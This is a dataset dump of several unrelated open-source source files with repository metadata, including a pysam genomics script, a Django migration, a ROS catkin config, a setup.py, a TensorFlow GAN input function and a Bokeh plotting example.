str(default_win)+'/split_reads/windows/DEL/windows.npz',
help="input file")
parser.add_argument('-o',
'--output',
type=str,
default='./cnn/win' +
str(default_win) +
'/split_reads/windows/DEL/windows_en.npz',
help="output file")
parser.add_argument('-l',
'--logfile',
default='./cnn/win' +
str(default_win) +
'/split_reads/windows/DEL/windows_en.log',
help='File in which to write logs.')
parser.add_argument('-lp',
'--log_every_n_pos',
type=int,
default=1000,
help='Write in log file every N positions')
parser.add_argument('-p',
'--padding',
type=int,
default=10,
help="Length of the padding in between windows")
return parser.parse_args()
def get_channels():
ch = [
# All reads (clipped or not)
'F_AR_N', 'R_AR_N',
# Split reads
'F_SR_L', 'F_SR_R', 'F_SR_B', 'R_SR_L', 'R_SR_R', 'R_SR_B', 'F_SR_N', 'R_SR_N',
# Clipped reads
'F_CR_L', 'F_CR_R', 'R_CR_L', 'R_CR_R', 'F_CR_B', 'R_CR_B', 'F_CR_N', 'R_CR_N',
# Discordant reads
'DR_F', 'DR_R',
# SV type channels
'DUP_A', 'DUP_B', 'INV_A', 'INV_B', 'TRA_O', 'TRA_S'
]
return {k: v for v, k in enumerate(ch)}
def update_channel(X, ch, counter, read, win_mid_pos, is_second_win, win_len, padding):
if is_left_clipped(read) and not is_right_clipped(read):
clipping = 'L'
elif not is_left_clipped(read) and is_right_clipped(read):
clipping = 'R'
elif is_left_clipped(read) and is_right_clipped(read):
clipping = 'B'
else:
clipping = 'N'
if read.has_tag('SA'):
clipped_state = 'SR'
elif is_left_clipped(read) or is_right_clipped(read):
clipped_state = 'CR'
else:
clipped_state = 'AR'
orientation = 'R' if read.is_reverse else 'F'
start_win = win_len + padding if is_second_win else 0
end_win = win_len * 2 + padding if is_second_win else win_len
abs_start = int(win_mid_pos - int(win_len / 2)) if win_len % 2 == 0 else \
int(win_mid_pos - int(win_len + 1 / 2))
abs_end = int(win_mid_pos + int(win_len / 2)) if win_len % 2 == 0 else \
int(win_mid_pos + int(win_len + 1 / 2))
start = max(read.reference_start, abs_start)
end = min(read.reference_end, abs_end)
rel_start = start_win + start - abs_start
rel_end = start_win + end - abs_start
assert rel_start >= 0
assert rel_end >= 0
assert start_win <= rel_start <= end_win
assert start_win <= rel_end <= end_win
skip = False
if is_left_clipped(read):
if (is_second_win and win_len + padding <= rel_start < win_len * 2 + padding) or \
(not is_second_win and 0 <= rel_start < win_len):
rel_pos = rel_start
else:
skip = True
elif is_right_clipped(read):
if (is_second_win and win_len + padding <= rel_end < win_len * 2 + padding) or \
(not is_second_win and 0 <= rel_end < win_len):
rel_pos = rel_end
else:
skip = True
else:
rel_pos = np.arange(max(start_win, rel_start), min(rel_end, end_win))
if not skip:
k = '_'.join([orientation, clipped_state, clipping])
if k in ch.keys():
X[counter, rel_pos, ch[k]] += 1
if not read.is_proper_pair:
k = '_'.join(['DR', orientation])
if k in ch.keys():
X[counter, rel_pos, ch[k]] += 1
if read.is_reverse and not read.mate_is_reverse \
and read.reference_start < read.next_reference_start:
k = '_'.join(['DUP', 'A'])
if k in ch.keys():
X[counter, rel_pos, ch[k]] += 1
if not read.is_reverse and read.mate_is_reverse \
and read.reference_start > read.next_reference_start:
k = '_'.join(['DUP', 'B'])
if k in ch.keys():
X[counter, rel_pos, ch[k]] += 1
if read.is_reverse == read.mate_is_reverse:
if read.reference_start < read.next_reference_start:
k = '_'.join(['INV', 'B'])
if k in ch.keys():
X[counter, rel_pos, ch[k]] += 1
else:
k = '_'.join(['INV', 'A'])
if k in ch.keys():
X[counter, rel_pos, ch[k]] += 1
if read.reference_name != read.next_reference_name:
if read.is_reverse == read.mate_is_reverse:
if read.reference_start < read.next_reference_start:
k = '_'.join(['TRA', 'S'])
if k in ch.keys():
X[counter, rel_pos, ch[k]] += 1
else:
k = '_'.join(['TRA', 'O'])
if k in ch.keys():
X[counter, rel_pos, ch[k]] += 1
return X
def add_channels(args, aln):
win = args.win if args.win % 2 == 0 else args.win + 1
def get_reads(chrom, pos):
return [read for read in aln.fetch(chrom, pos - int(win / 2), pos + int(win / 2))]
# Load the windows
logging.info("Loading windows...")
last_t = time()
X, y = load_windows(args.input)
logging.info("Windows loaded in %f seconds" % (time() - last_t))
# Load the channels
ch = get_channels()
# get starting time
last_t = time()
# Initialize numpy array
X_enh = np.zeros(shape=(X.shape[:2] + (len(ch),)), dtype=np.int8)
for i, p in enumerate(y.keys(), start=0):
# Every n_r alignments, write log informations
if not i % args.log_every_n_pos and i != 0:
# Record the current time
now_t = time()
logging.info("%d positions processed (%f positions / s)" %
(i, args.log_every_n_pos / (now_t - last_t)))
last_t = time()
# Get genomic coordinates
chrom1, pos1, chrom2, pos2, strand_info = p.split('_')
pos1, pos2 = int(pos1), int(pos2)
# Fetch reads overlapping each window
win1_reads = get_reads(chrom1, pos1)
win2_reads = get_reads(chrom2, pos2)
# Which reads are in both windows?
win1_read_names_set = {read.query_name for read in win1_reads}
win2_read_names_set = {read.query_name for read in win2_reads}
common_read_names = win1_read_names_set & win2_read_names_set
# Only consider reads common to both windows
win1_reads = {
r for r in win1_reads if r.query_name in common_read_names and not r.is_unmapped}
win2_reads = {
r for r in win2_reads if r.query_name in common_read_names and not r.is_unmapped}
for r in win1_reads:
X_enh = update_channel(X_enh, ch, i, r, pos1,
False, win, args.padding)
for r in win2_reads:
X_enh = update_channel(X_enh, ch, i, r, pos2,
True, win, args.padding)
for i in np.arange(X_enh.shape[2]):
logging.info("win channels array: non-zero elements at index %d:%d" %
(i, np.argwhere(X_enh[i, :] != 0).shape[0]))
X = np.concatenate((X, X_enh), axis=2)
print(X.shape)
for i in np.arange(X.shape[2]):
logging.info("full channels array: NaN elements at index %d:%d" %
(i, len(np.argwhere(np.isnan(X[i, :])))))
return X, y
def main():
args = parse_args()
init_log(args.logfile)
t0 = time()
with pysam.AlignmentFile(args.bam, "rb") as bam:
X, y = add_channels(args, bam)
save_windows(X, y, args.output)
logging.info('Finished in %f seconds' % (time() - t0))
if __name__ == '__main__':
main()
| 36.385827
| 93
| 0.528565
|
import argparse
import logging
from time import time
import numpy as np
import pysam
from functions import (is_left_clipped, is_right_clipped, load_windows,
save_windows)
def init_log(logfile):
FORMAT = '%(asctime)s %(message)s'
logging.basicConfig(format=FORMAT,
filename=logfile,
filemode='w',
level=logging.INFO)
def parse_args():
default_win = 25
parser = argparse.ArgumentParser(
description='Add window specific channels')
parser.add_argument('-b',
'--bam',
type=str,
default='../../data/test.bam',
help="Specify input file (BAM)")
parser.add_argument('-w',
'--win',
type=int,
default=default_win,
help="Window size")
parser.add_argument('-i',
'--input',
type=str,
default='./cnn/win' +
str(default_win)+'/split_reads/windows/DEL/windows.npz',
help="input file")
parser.add_argument('-o',
'--output',
type=str,
default='./cnn/win' +
str(default_win) +
'/split_reads/windows/DEL/windows_en.npz',
help="output file")
parser.add_argument('-l',
'--logfile',
default='./cnn/win' +
str(default_win) +
'/split_reads/windows/DEL/windows_en.log',
help='File in which to write logs.')
parser.add_argument('-lp',
'--log_every_n_pos',
type=int,
default=1000,
help='Write in log file every N positions')
parser.add_argument('-p',
'--padding',
type=int,
default=10,
help="Length of the padding in between windows")
return parser.parse_args()
def get_channels():
ch = [
'F_AR_N', 'R_AR_N',
'F_SR_L', 'F_SR_R', 'F_SR_B', 'R_SR_L', 'R_SR_R', 'R_SR_B', 'F_SR_N', 'R_SR_N',
'F_CR_L', 'F_CR_R', 'R_CR_L', 'R_CR_R', 'F_CR_B', 'R_CR_B', 'F_CR_N', 'R_CR_N',
'DR_F', 'DR_R',
'DUP_A', 'DUP_B', 'INV_A', 'INV_B', 'TRA_O', 'TRA_S'
]
return {k: v for v, k in enumerate(ch)}
def update_channel(X, ch, counter, read, win_mid_pos, is_second_win, win_len, padding):
if is_left_clipped(read) and not is_right_clipped(read):
clipping = 'L'
elif not is_left_clipped(read) and is_right_clipped(read):
clipping = 'R'
elif is_left_clipped(read) and is_right_clipped(read):
clipping = 'B'
else:
clipping = 'N'
if read.has_tag('SA'):
clipped_state = 'SR'
elif is_left_clipped(read) or is_right_clipped(read):
clipped_state = 'CR'
else:
clipped_state = 'AR'
orientation = 'R' if read.is_reverse else 'F'
start_win = win_len + padding if is_second_win else 0
end_win = win_len * 2 + padding if is_second_win else win_len
abs_start = int(win_mid_pos - int(win_len / 2)) if win_len % 2 == 0 else \
int(win_mid_pos - int(win_len + 1 / 2))
abs_end = int(win_mid_pos + int(win_len / 2)) if win_len % 2 == 0 else \
int(win_mid_pos + int(win_len + 1 / 2))
start = max(read.reference_start, abs_start)
end = min(read.reference_end, abs_end)
rel_start = start_win + start - abs_start
rel_end = start_win + end - abs_start
assert rel_start >= 0
assert rel_end >= 0
assert start_win <= rel_start <= end_win
assert start_win <= rel_end <= end_win
skip = False
if is_left_clipped(read):
if (is_second_win and win_len + padding <= rel_start < win_len * 2 + padding) or \
(not is_second_win and 0 <= rel_start < win_len):
rel_pos = rel_start
else:
skip = True
elif is_right_clipped(read):
if (is_second_win and win_len + padding <= rel_end < win_len * 2 + padding) or \
(not is_second_win and 0 <= rel_end < win_len):
rel_pos = rel_end
else:
skip = True
else:
rel_pos = np.arange(max(start_win, rel_start), min(rel_end, end_win))
if not skip:
k = '_'.join([orientation, clipped_state, clipping])
if k in ch.keys():
X[counter, rel_pos, ch[k]] += 1
if not read.is_proper_pair:
k = '_'.join(['DR', orientation])
if k in ch.keys():
X[counter, rel_pos, ch[k]] += 1
if read.is_reverse and not read.mate_is_reverse \
and read.reference_start < read.next_reference_start:
k = '_'.join(['DUP', 'A'])
if k in ch.keys():
X[counter, rel_pos, ch[k]] += 1
if not read.is_reverse and read.mate_is_reverse \
and read.reference_start > read.next_reference_start:
k = '_'.join(['DUP', 'B'])
if k in ch.keys():
X[counter, rel_pos, ch[k]] += 1
if read.is_reverse == read.mate_is_reverse:
if read.reference_start < read.next_reference_start:
k = '_'.join(['INV', 'B'])
if k in ch.keys():
X[counter, rel_pos, ch[k]] += 1
else:
k = '_'.join(['INV', 'A'])
if k in ch.keys():
X[counter, rel_pos, ch[k]] += 1
if read.reference_name != read.next_reference_name:
if read.is_reverse == read.mate_is_reverse:
if read.reference_start < read.next_reference_start:
k = '_'.join(['TRA', 'S'])
if k in ch.keys():
X[counter, rel_pos, ch[k]] += 1
else:
k = '_'.join(['TRA', 'O'])
if k in ch.keys():
X[counter, rel_pos, ch[k]] += 1
return X
def add_channels(args, aln):
win = args.win if args.win % 2 == 0 else args.win + 1
def get_reads(chrom, pos):
return [read for read in aln.fetch(chrom, pos - int(win / 2), pos + int(win / 2))]
logging.info("Loading windows...")
last_t = time()
X, y = load_windows(args.input)
logging.info("Windows loaded in %f seconds" % (time() - last_t))
ch = get_channels()
last_t = time()
X_enh = np.zeros(shape=(X.shape[:2] + (len(ch),)), dtype=np.int8)
for i, p in enumerate(y.keys(), start=0):
if not i % args.log_every_n_pos and i != 0:
now_t = time()
logging.info("%d positions processed (%f positions / s)" %
(i, args.log_every_n_pos / (now_t - last_t)))
last_t = time()
chrom1, pos1, chrom2, pos2, strand_info = p.split('_')
pos1, pos2 = int(pos1), int(pos2)
win1_reads = get_reads(chrom1, pos1)
win2_reads = get_reads(chrom2, pos2)
win1_read_names_set = {read.query_name for read in win1_reads}
win2_read_names_set = {read.query_name for read in win2_reads}
common_read_names = win1_read_names_set & win2_read_names_set
win1_reads = {
r for r in win1_reads if r.query_name in common_read_names and not r.is_unmapped}
win2_reads = {
r for r in win2_reads if r.query_name in common_read_names and not r.is_unmapped}
for r in win1_reads:
X_enh = update_channel(X_enh, ch, i, r, pos1,
False, win, args.padding)
for r in win2_reads:
X_enh = update_channel(X_enh, ch, i, r, pos2,
True, win, args.padding)
for i in np.arange(X_enh.shape[2]):
logging.info("win channels array: non-zero elements at index %d:%d" %
(i, np.argwhere(X_enh[i, :] != 0).shape[0]))
X = np.concatenate((X, X_enh), axis=2)
print(X.shape)
for i in np.arange(X.shape[2]):
logging.info("full channels array: NaN elements at index %d:%d" %
(i, len(np.argwhere(np.isnan(X[i, :])))))
return X, y
def main():
args = parse_args()
init_log(args.logfile)
t0 = time()
with pysam.AlignmentFile(args.bam, "rb") as bam:
X, y = add_channels(args, bam)
save_windows(X, y, args.output)
logging.info('Finished in %f seconds' % (time() - t0))
if __name__ == '__main__':
main()
| true
| true
|
1c40e97cc8a3abf448891862595818c4fa990f21
| 4,546
|
py
|
Python
|
saleor/product/migrations/0030_auto_20170206_0407.py
|
dedhio/bellastore
|
03cad4d11c039c6c33291021def812570c09fe36
|
[
"BSD-3-Clause"
] | 3
|
2019-06-09T18:00:54.000Z
|
2019-06-18T10:07:39.000Z
|
saleor/product/migrations/0030_auto_20170206_0407.py
|
dedhio/bellastore
|
03cad4d11c039c6c33291021def812570c09fe36
|
[
"BSD-3-Clause"
] | 2
|
2019-07-02T13:39:49.000Z
|
2019-07-07T09:38:27.000Z
|
saleor/product/migrations/0030_auto_20170206_0407.py
|
dedhio/bellastore
|
03cad4d11c039c6c33291021def812570c09fe36
|
[
"BSD-3-Clause"
] | 1
|
2019-05-02T17:30:49.000Z
|
2019-05-02T17:30:49.000Z
|
# -*- coding: utf-8 -*-
# Generated by Django 1.10.5 on 2017-02-06 10:07
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
import versatileimagefield.fields
class Migration(migrations.Migration):
dependencies = [("product", "0029_product_is_featured")]
operations = [
migrations.AlterModelOptions(
name="attributechoicevalue",
options={
"verbose_name": "attribute choices value",
"verbose_name_plural": "attribute choices values",
},
),
migrations.AlterModelOptions(
name="category",
options={"verbose_name": "category", "verbose_name_plural": "categories"},
),
migrations.AlterModelOptions(
name="product",
options={"verbose_name": "product", "verbose_name_plural": "products"},
),
migrations.AlterModelOptions(
name="productattribute",
options={
"ordering": ("name",),
"verbose_name": "product attribute",
"verbose_name_plural": "product attributes",
},
),
migrations.AlterModelOptions(
name="productclass",
options={
"verbose_name": "product class",
"verbose_name_plural": "product classes",
},
),
migrations.AlterModelOptions(
name="productimage",
options={
"ordering": ("order",),
"verbose_name": "product image",
"verbose_name_plural": "product images",
},
),
migrations.AlterModelOptions(
name="productvariant",
options={
"verbose_name": "product variant",
"verbose_name_plural": "product variants",
},
),
migrations.AlterModelOptions(
name="variantimage",
options={
"verbose_name": "variant image",
"verbose_name_plural": "variant images",
},
),
migrations.AlterField(
model_name="product",
name="product_class",
field=models.ForeignKey(
on_delete=django.db.models.deletion.CASCADE,
related_name="products",
to="product.ProductClass",
verbose_name="product class",
),
),
migrations.AlterField(
model_name="productimage",
name="image",
field=versatileimagefield.fields.VersatileImageField(
upload_to="products", verbose_name="image"
),
),
migrations.AlterField(
model_name="productimage",
name="order",
field=models.PositiveIntegerField(editable=False, verbose_name="order"),
),
migrations.AlterField(
model_name="productimage",
name="ppoi",
field=versatileimagefield.fields.PPOIField(
default="0.5x0.5", editable=False, max_length=20, verbose_name="ppoi"
),
),
migrations.AlterField(
model_name="productimage",
name="product",
field=models.ForeignKey(
on_delete=django.db.models.deletion.CASCADE,
related_name="images",
to="product.Product",
verbose_name="product",
),
),
migrations.AlterField(
model_name="productvariant",
name="images",
field=models.ManyToManyField(
through="product.VariantImage",
to="product.ProductImage",
verbose_name="images",
),
),
migrations.AlterField(
model_name="variantimage",
name="image",
field=models.ForeignKey(
on_delete=django.db.models.deletion.CASCADE,
related_name="variant_images",
to="product.ProductImage",
verbose_name="image",
),
),
migrations.AlterField(
model_name="variantimage",
name="variant",
field=models.ForeignKey(
on_delete=django.db.models.deletion.CASCADE,
related_name="variant_images",
to="product.ProductVariant",
verbose_name="variant",
),
),
]
| 33.426471
| 86
| 0.523977
|
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
import versatileimagefield.fields
class Migration(migrations.Migration):
dependencies = [("product", "0029_product_is_featured")]
operations = [
migrations.AlterModelOptions(
name="attributechoicevalue",
options={
"verbose_name": "attribute choices value",
"verbose_name_plural": "attribute choices values",
},
),
migrations.AlterModelOptions(
name="category",
options={"verbose_name": "category", "verbose_name_plural": "categories"},
),
migrations.AlterModelOptions(
name="product",
options={"verbose_name": "product", "verbose_name_plural": "products"},
),
migrations.AlterModelOptions(
name="productattribute",
options={
"ordering": ("name",),
"verbose_name": "product attribute",
"verbose_name_plural": "product attributes",
},
),
migrations.AlterModelOptions(
name="productclass",
options={
"verbose_name": "product class",
"verbose_name_plural": "product classes",
},
),
migrations.AlterModelOptions(
name="productimage",
options={
"ordering": ("order",),
"verbose_name": "product image",
"verbose_name_plural": "product images",
},
),
migrations.AlterModelOptions(
name="productvariant",
options={
"verbose_name": "product variant",
"verbose_name_plural": "product variants",
},
),
migrations.AlterModelOptions(
name="variantimage",
options={
"verbose_name": "variant image",
"verbose_name_plural": "variant images",
},
),
migrations.AlterField(
model_name="product",
name="product_class",
field=models.ForeignKey(
on_delete=django.db.models.deletion.CASCADE,
related_name="products",
to="product.ProductClass",
verbose_name="product class",
),
),
migrations.AlterField(
model_name="productimage",
name="image",
field=versatileimagefield.fields.VersatileImageField(
upload_to="products", verbose_name="image"
),
),
migrations.AlterField(
model_name="productimage",
name="order",
field=models.PositiveIntegerField(editable=False, verbose_name="order"),
),
migrations.AlterField(
model_name="productimage",
name="ppoi",
field=versatileimagefield.fields.PPOIField(
default="0.5x0.5", editable=False, max_length=20, verbose_name="ppoi"
),
),
migrations.AlterField(
model_name="productimage",
name="product",
field=models.ForeignKey(
on_delete=django.db.models.deletion.CASCADE,
related_name="images",
to="product.Product",
verbose_name="product",
),
),
migrations.AlterField(
model_name="productvariant",
name="images",
field=models.ManyToManyField(
through="product.VariantImage",
to="product.ProductImage",
verbose_name="images",
),
),
migrations.AlterField(
model_name="variantimage",
name="image",
field=models.ForeignKey(
on_delete=django.db.models.deletion.CASCADE,
related_name="variant_images",
to="product.ProductImage",
verbose_name="image",
),
),
migrations.AlterField(
model_name="variantimage",
name="variant",
field=models.ForeignKey(
on_delete=django.db.models.deletion.CASCADE,
related_name="variant_images",
to="product.ProductVariant",
verbose_name="variant",
),
),
]
| true
| true
|
1c40ea3df699becca2e1a9f4d5908ab9016d4a01
| 2,398
|
py
|
Python
|
catkin_ws/build/cv_camera/catkin_generated/pkg.develspace.context.pc.py
|
BiggieBoo18/mr_robotarm
|
c4afb4270e8ef70b9238760584575cc9e18c8d7b
|
[
"MIT"
] | null | null | null |
catkin_ws/build/cv_camera/catkin_generated/pkg.develspace.context.pc.py
|
BiggieBoo18/mr_robotarm
|
c4afb4270e8ef70b9238760584575cc9e18c8d7b
|
[
"MIT"
] | null | null | null |
catkin_ws/build/cv_camera/catkin_generated/pkg.develspace.context.pc.py
|
BiggieBoo18/mr_robotarm
|
c4afb4270e8ef70b9238760584575cc9e18c8d7b
|
[
"MIT"
] | null | null | null |
# generated from catkin/cmake/template/pkg.context.pc.in
CATKIN_PACKAGE_PREFIX = ""
PROJECT_PKG_CONFIG_INCLUDE_DIRS = "C:/Users/yahoo/hack/mr_robotarm/catkin_ws/src/cv_camera/include;C:/opt/ros/melodic/x64/include;C:/opt/ros/melodic/x64/include/opencv".split(';') if "C:/Users/yahoo/hack/mr_robotarm/catkin_ws/src/cv_camera/include;C:/opt/ros/melodic/x64/include;C:/opt/ros/melodic/x64/include/opencv" != "" else []
PROJECT_CATKIN_DEPENDS = "image_transport;roscpp;cv_bridge;sensor_msgs;nodelet;camera_info_manager".replace(';', ' ')
PKG_CONFIG_LIBRARIES_WITH_PREFIX = "-lcv_camera;C:/opt/ros/melodic/x64/lib/opencv_calib3d341.lib;C:/opt/ros/melodic/x64/lib/opencv_core341.lib;C:/opt/ros/melodic/x64/lib/opencv_dnn341.lib;C:/opt/ros/melodic/x64/lib/opencv_features2d341.lib;C:/opt/ros/melodic/x64/lib/opencv_flann341.lib;C:/opt/ros/melodic/x64/lib/opencv_highgui341.lib;C:/opt/ros/melodic/x64/lib/opencv_imgcodecs341.lib;C:/opt/ros/melodic/x64/lib/opencv_imgproc341.lib;C:/opt/ros/melodic/x64/lib/opencv_ml341.lib;C:/opt/ros/melodic/x64/lib/opencv_objdetect341.lib;C:/opt/ros/melodic/x64/lib/opencv_photo341.lib;C:/opt/ros/melodic/x64/lib/opencv_shape341.lib;C:/opt/ros/melodic/x64/lib/opencv_stitching341.lib;C:/opt/ros/melodic/x64/lib/opencv_superres341.lib;C:/opt/ros/melodic/x64/lib/opencv_video341.lib;C:/opt/ros/melodic/x64/lib/opencv_videoio341.lib;C:/opt/ros/melodic/x64/lib/opencv_videostab341.lib".split(';') if "-lcv_camera;C:/opt/ros/melodic/x64/lib/opencv_calib3d341.lib;C:/opt/ros/melodic/x64/lib/opencv_core341.lib;C:/opt/ros/melodic/x64/lib/opencv_dnn341.lib;C:/opt/ros/melodic/x64/lib/opencv_features2d341.lib;C:/opt/ros/melodic/x64/lib/opencv_flann341.lib;C:/opt/ros/melodic/x64/lib/opencv_highgui341.lib;C:/opt/ros/melodic/x64/lib/opencv_imgcodecs341.lib;C:/opt/ros/melodic/x64/lib/opencv_imgproc341.lib;C:/opt/ros/melodic/x64/lib/opencv_ml341.lib;C:/opt/ros/melodic/x64/lib/opencv_objdetect341.lib;C:/opt/ros/melodic/x64/lib/opencv_photo341.lib;C:/opt/ros/melodic/x64/lib/opencv_shape341.lib;C:/opt/ros/melodic/x64/lib/opencv_stitching341.lib;C:/opt/ros/melodic/x64/lib/opencv_superres341.lib;C:/opt/ros/melodic/x64/lib/opencv_video341.lib;C:/opt/ros/melodic/x64/lib/opencv_videoio341.lib;C:/opt/ros/melodic/x64/lib/opencv_videostab341.lib" != "" else []
PROJECT_NAME = "cv_camera"
PROJECT_SPACE_DIR = "C:/Users/yahoo/hack/mr_robotarm/catkin_ws/devel"
PROJECT_VERSION = "0.5.0"
| 266.444444
| 1,740
| 0.802335
|
CATKIN_PACKAGE_PREFIX = ""
PROJECT_PKG_CONFIG_INCLUDE_DIRS = "C:/Users/yahoo/hack/mr_robotarm/catkin_ws/src/cv_camera/include;C:/opt/ros/melodic/x64/include;C:/opt/ros/melodic/x64/include/opencv".split(';') if "C:/Users/yahoo/hack/mr_robotarm/catkin_ws/src/cv_camera/include;C:/opt/ros/melodic/x64/include;C:/opt/ros/melodic/x64/include/opencv" != "" else []
PROJECT_CATKIN_DEPENDS = "image_transport;roscpp;cv_bridge;sensor_msgs;nodelet;camera_info_manager".replace(';', ' ')
PKG_CONFIG_LIBRARIES_WITH_PREFIX = "-lcv_camera;C:/opt/ros/melodic/x64/lib/opencv_calib3d341.lib;C:/opt/ros/melodic/x64/lib/opencv_core341.lib;C:/opt/ros/melodic/x64/lib/opencv_dnn341.lib;C:/opt/ros/melodic/x64/lib/opencv_features2d341.lib;C:/opt/ros/melodic/x64/lib/opencv_flann341.lib;C:/opt/ros/melodic/x64/lib/opencv_highgui341.lib;C:/opt/ros/melodic/x64/lib/opencv_imgcodecs341.lib;C:/opt/ros/melodic/x64/lib/opencv_imgproc341.lib;C:/opt/ros/melodic/x64/lib/opencv_ml341.lib;C:/opt/ros/melodic/x64/lib/opencv_objdetect341.lib;C:/opt/ros/melodic/x64/lib/opencv_photo341.lib;C:/opt/ros/melodic/x64/lib/opencv_shape341.lib;C:/opt/ros/melodic/x64/lib/opencv_stitching341.lib;C:/opt/ros/melodic/x64/lib/opencv_superres341.lib;C:/opt/ros/melodic/x64/lib/opencv_video341.lib;C:/opt/ros/melodic/x64/lib/opencv_videoio341.lib;C:/opt/ros/melodic/x64/lib/opencv_videostab341.lib".split(';') if "-lcv_camera;C:/opt/ros/melodic/x64/lib/opencv_calib3d341.lib;C:/opt/ros/melodic/x64/lib/opencv_core341.lib;C:/opt/ros/melodic/x64/lib/opencv_dnn341.lib;C:/opt/ros/melodic/x64/lib/opencv_features2d341.lib;C:/opt/ros/melodic/x64/lib/opencv_flann341.lib;C:/opt/ros/melodic/x64/lib/opencv_highgui341.lib;C:/opt/ros/melodic/x64/lib/opencv_imgcodecs341.lib;C:/opt/ros/melodic/x64/lib/opencv_imgproc341.lib;C:/opt/ros/melodic/x64/lib/opencv_ml341.lib;C:/opt/ros/melodic/x64/lib/opencv_objdetect341.lib;C:/opt/ros/melodic/x64/lib/opencv_photo341.lib;C:/opt/ros/melodic/x64/lib/opencv_shape341.lib;C:/opt/ros/melodic/x64/lib/opencv_stitching341.lib;C:/opt/ros/melodic/x64/lib/opencv_superres341.lib;C:/opt/ros/melodic/x64/lib/opencv_video341.lib;C:/opt/ros/melodic/x64/lib/opencv_videoio341.lib;C:/opt/ros/melodic/x64/lib/opencv_videostab341.lib" != "" else []
PROJECT_NAME = "cv_camera"
PROJECT_SPACE_DIR = "C:/Users/yahoo/hack/mr_robotarm/catkin_ws/devel"
PROJECT_VERSION = "0.5.0"
| true
| true
|
1c40ea8a1ea02e403128b1f2ac60d944b4f261f9
| 472
|
py
|
Python
|
setup.py
|
GoPreki/xlrd-layer
|
a6f172debe304c69fad7f69c619896d4d0ef0157
|
[
"MIT"
] | null | null | null |
setup.py
|
GoPreki/xlrd-layer
|
a6f172debe304c69fad7f69c619896d4d0ef0157
|
[
"MIT"
] | null | null | null |
setup.py
|
GoPreki/xlrd-layer
|
a6f172debe304c69fad7f69c619896d4d0ef0157
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
from distutils.core import setup
setup(
name="xlrd-layer",
version="1.0.0",
author="Preki",
author_email="ramos@gopreki.com",
packages=['xlrd_layer'],
url='https://gopreki.com',
download_url="https://github.com/GoPreki/xlrd-layer",
license="MIT",
description="Python library for Preki xlsx reading process",
long_description="Python library for Preki xlsx reading process",
install_requires=["xlrd"],
)
| 26.222222
| 69
| 0.684322
|
from distutils.core import setup
setup(
name="xlrd-layer",
version="1.0.0",
author="Preki",
author_email="ramos@gopreki.com",
packages=['xlrd_layer'],
url='https://gopreki.com',
download_url="https://github.com/GoPreki/xlrd-layer",
license="MIT",
description="Python library for Preki xlsx reading process",
long_description="Python library for Preki xlsx reading process",
install_requires=["xlrd"],
)
| true
| true
|
1c40ec6bc7f7a08df1164f18f3642a58ac7ae014
| 1,042
|
py
|
Python
|
dist_input.py
|
omidsakhi/tpu_dist_gan
|
c676540dcd7c9fc8eb3e01bb976ed6655e1c906d
|
[
"Apache-2.0"
] | 1
|
2019-12-09T04:45:33.000Z
|
2019-12-09T04:45:33.000Z
|
dist_input.py
|
omidsakhi/tpu_dist_gan
|
c676540dcd7c9fc8eb3e01bb976ed6655e1c906d
|
[
"Apache-2.0"
] | null | null | null |
dist_input.py
|
omidsakhi/tpu_dist_gan
|
c676540dcd7c9fc8eb3e01bb976ed6655e1c906d
|
[
"Apache-2.0"
] | null | null | null |
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
import tensorflow as tf
import math
class InputFunction(object):
def __init__(self, noise_dim):
self.noise_dim = noise_dim
def points_on_circle(self, num, r):
pi = 3.141592
coords = [ (r * math.cos((2. / num) * i * pi) , r * math.sin((2. / num) * i * pi) ) for i in range(num)]
return coords
def __call__(self, params):
batch_size = params['batch_size']
random_noise = tf.random_normal([batch_size, self.noise_dim])
dist = tf.contrib.distributions # pylint: disable=E1101
p = self.points_on_circle(8, 2.)
gauss = dist.Mixture(
cat=dist.Categorical(probs=[0.25 for _ in range(8)]),
components=[
dist.MultivariateNormalDiag(loc=p[i], scale_diag=[0.02, 0.02]) for i in range(8)
])
samples = gauss.sample([batch_size])
features = {
'samples': samples,
'random_noise': random_noise}
return features
| 28.944444
| 109
| 0.65739
|
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
import tensorflow as tf
import math
class InputFunction(object):
def __init__(self, noise_dim):
self.noise_dim = noise_dim
def points_on_circle(self, num, r):
pi = 3.141592
coords = [ (r * math.cos((2. / num) * i * pi) , r * math.sin((2. / num) * i * pi) ) for i in range(num)]
return coords
def __call__(self, params):
batch_size = params['batch_size']
random_noise = tf.random_normal([batch_size, self.noise_dim])
dist = tf.contrib.distributions
p = self.points_on_circle(8, 2.)
gauss = dist.Mixture(
cat=dist.Categorical(probs=[0.25 for _ in range(8)]),
components=[
dist.MultivariateNormalDiag(loc=p[i], scale_diag=[0.02, 0.02]) for i in range(8)
])
samples = gauss.sample([batch_size])
features = {
'samples': samples,
'random_noise': random_noise}
return features
| true
| true
|
1c40ed0b3aa037a17466cfff094defcdad7bafa7
| 677
|
py
|
Python
|
examples/plotting/file/jitter.py
|
kevin1kevin1k/bokeh
|
9f34b5b710e2748ec803c12918ec1706098a3477
|
[
"BSD-3-Clause"
] | 17
|
2020-06-14T03:47:35.000Z
|
2022-03-07T00:25:23.000Z
|
examples/plotting/file/jitter.py
|
kevin1kevin1k/bokeh
|
9f34b5b710e2748ec803c12918ec1706098a3477
|
[
"BSD-3-Clause"
] | 12
|
2020-07-22T22:40:09.000Z
|
2021-03-17T14:10:27.000Z
|
examples/plotting/file/jitter.py
|
kevin1kevin1k/bokeh
|
9f34b5b710e2748ec803c12918ec1706098a3477
|
[
"BSD-3-Clause"
] | 8
|
2020-06-14T03:47:23.000Z
|
2021-11-20T15:14:04.000Z
|
from bokeh.layouts import column
from bokeh.plotting import figure, show, output_file
from bokeh.sampledata.autompg import autompg
from bokeh.transform import jitter
years = sorted(autompg.yr.unique())
p1 = figure(plot_width=600, plot_height=300, title="Years vs mpg without jittering")
p1.xgrid.grid_line_color = None
p1.xaxis[0].ticker = years
p1.circle(x='yr', y='mpg', size=9, alpha=0.4, source=autompg)
p2 = figure(plot_width=600, plot_height=300, title="Years vs mpg with jittering")
p2.xgrid.grid_line_color = None
p2.xaxis[0].ticker = years
p2.circle(x=jitter('yr', 0.4), y='mpg', size=9, alpha=0.4, source=autompg)
output_file("jitter.html")
show(column(p1, p2))
| 32.238095
| 84
| 0.751846
|
from bokeh.layouts import column
